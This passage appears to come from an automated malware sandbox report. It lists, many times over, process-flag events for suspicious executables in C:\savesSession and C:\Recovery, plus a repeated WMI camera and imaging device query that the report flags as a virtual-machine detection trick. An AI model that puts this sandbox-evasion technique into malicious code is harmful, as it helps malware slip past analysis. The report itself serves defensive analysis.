                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
